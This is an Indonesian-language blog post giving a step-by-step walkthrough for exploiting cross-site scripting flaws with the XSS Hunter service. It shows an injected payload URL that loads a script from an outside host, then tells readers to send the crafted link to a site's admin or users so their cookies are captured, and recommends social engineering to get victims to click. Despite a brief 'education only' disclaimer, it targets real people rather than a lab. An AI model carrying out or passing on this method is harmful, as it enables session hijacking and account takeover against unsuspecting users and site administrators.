MASIGNALPHAS2101
3071178398193978069

Cara memanfaatkan bug Xss - Cross site scripting (XssHunter.Com) !!!

Cara memanfaatkan bug Xss - Cross site scripting (XssHunter.Com) !!!
Add Comments
Monday, December 7, 2020

Halo, apakah kamu mengunjungi artikel ini karena ini mengetahui bagaimana cara memanfaatkan bug / kerentanan xss (cross site scripting) ??

Jika iya artikel ini pas untuk kamu, btw inget ya!

Pembahasan kali ini hanya sebagai edukasi, kamu boleh mempraktekanya asalkan tidak merugikan orang lain atau untuk disalahgunakan !!!

Baik, lanjut..

Hal pertama yang harus kamu lakukan adalah mendaftar akun di https://xsshunter.com.

Jika sudah silahkan klik menu payload, lalu salin salah satu payload disana.

Kamu bebas memilih payloadnya, asalkan website yang akan dipasangkan payload tersebut mau menerima dan menjalankanya.

Selanjutnya kamu silahkan buka situs yang rentan xss tersebut, lalu kamu pasangkan payloadnya di tempat yang rentan.

Ingat, tempat yang rentan, jadi tidak harus di url paramater, dimana saja bisa asalkan rentan.

Jika sudah salin link + payload tersebut


Baca Juga :


Contoh :
site.com/search?url="><script src=https://tes.com/tes.js></script>

Langkah selanjutnya untuk memanfaatkan atau mengeksploitasi bug ini adalah, silahkan hubungi target kamu, lalu berikan Link + payload tersebut ke dia, misalkan admin websitenya atau pengguna lain di situs tersebut.

Jika dia mengklik / membukanya maka payload akan secara otomatis bekerja dan membawakan cookienya ke xsshunter kamu.

Jika sudah berhasil di klik oleh dia, coba kamu cek website xsshunter tadi pada akun kamu.

Secara otomatis cookie dia akan berhasil kamu dapatkan, dan kamu dapat menggunakanya untuk hal postif saja ya!

Noted :
Untuk lebih cepat berhasilnya silahkan gunakan tehnik social enggineering yang baik dan benar.


Hai! Jika Kamu Belajar Hal Baru Hari Ini, Jangan Lupa Share Artikel Ini, Semoga Artikel Kali Ini Dapat Bermanfaat Untuk Kamu Dan Temanmu, Terimakasih Telah Membaca Dan Sampai Jumpa Di Artikel Selanjutnya..

Note: Only a member of this blog may post a comment.